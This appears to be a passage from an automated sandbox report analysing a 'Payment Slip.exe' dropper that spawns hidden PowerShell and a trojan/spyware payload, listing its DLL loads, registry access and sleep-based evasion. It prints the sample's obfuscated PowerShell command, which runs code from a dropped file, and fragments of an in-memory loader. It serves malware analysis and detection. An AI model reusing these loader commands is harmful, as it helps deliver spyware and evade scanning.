Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0CDC8 7_2_04E0CDC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E009D0 7_2_04E009D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0E3A8 7_2_04E0E3A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0B1A8 7_2_04E0B1A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0C788 7_2_04E0C788
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E09588 7_2_04E09588
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E01360 7_2_04E01360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0AB68 7_2_04E0AB68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0DD68 7_2_04E0DD68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0C148 7_2_04E0C148
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E08F48 7_2_04E08F48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0F348 7_2_04E0F348
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0134F 7_2_04E0134F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0D728 7_2_04E0D728
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0A528 7_2_04E0A528
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0ED08 7_2_04E0ED08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E00508 7_2_04E00508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E08908 7_2_04E08908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E0BB08 7_2_04E0BB08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E836F0 7_2_04E836F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E841BC 7_2_04E841BC
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E80D88 7_2_04E80D88
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E81470 7_2_04E81470
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E81B50 7_2_04E81B50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E82920 7_2_04E82920
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E82238 7_2_04E82238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E83008 7_2_04E83008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E836E1 7_2_04E836E1
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E82FFB 7_2_04E82FFB
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E808DE 7_2_04E808DE
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E8146B 7_2_04E8146B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E80960 7_2_04E80960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E80D79 7_2_04E80D79
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E80040 7_2_04E80040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E82229 7_2_04E82229
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E81B3F 7_2_04E81B3F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E80006 7_2_04E80006
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E80A10 7_2_04E80A10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04E82911 7_2_04E82911
Source: Payment Slip.exe Static PE information: invalid certificate
Source: Payment Slip.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045C8
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Users\user\Desktop\Payment Slip.exe File created: C:\Users\user\AppData\Local\Temp\nsh287F.tmp
Source: Payment Slip.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\Payment Slip.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Payment Slip.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Payment Slip.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Payment Slip.exe File read: C:\Users\user\Desktop\Payment Slip.exe
Source: unknown Process created: C:\Users\user\Desktop\Payment Slip.exe "C:\Users\user\Desktop\Payment Slip.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Payment Slip.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Torosity $Politimssigasiliscan $Socialpdagoger), (Ionoxalis163 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:hebrisk = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afrormosia)), $Pleurocentesis).DefineDynamicModule($Greenwithe, $false).DefineType($Gwragedd, $Lynche, [System.MulticastDelegate])$Non
Source: C:\Users\user\Desktop\Payment Slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Source: C:\Users\user\Desktop\Payment Slip.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) " Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_071CC93B pushfd ; ret 2_2_071CC93C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_071CC926 pushfd ; ret 2_2_071CC927
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_3_0019CA98 pushfd ; retf 0019h 7_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_3_0019EE18 push eax; iretd 7_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_3_0019EE8C push eax; iretd 7_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_3_0019CF4C push eax; iretd 7_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_00159C30 push esp; retf 0017h 7_2_00159D55
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Masculinity.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe API/Special instruction interceptor: Address: 2B447A9
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Memory allocated: 20E60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Memory allocated: 20C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598391 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595030 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7503 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2173 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Window / User API: threadDelayed 928 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Window / User API: threadDelayed 8919 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe API coverage: 1.0 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892 Thread sleep count: 928 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892 Thread sleep count: 8919 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598953s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598391s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598281s >= -30000s Jump to behavior
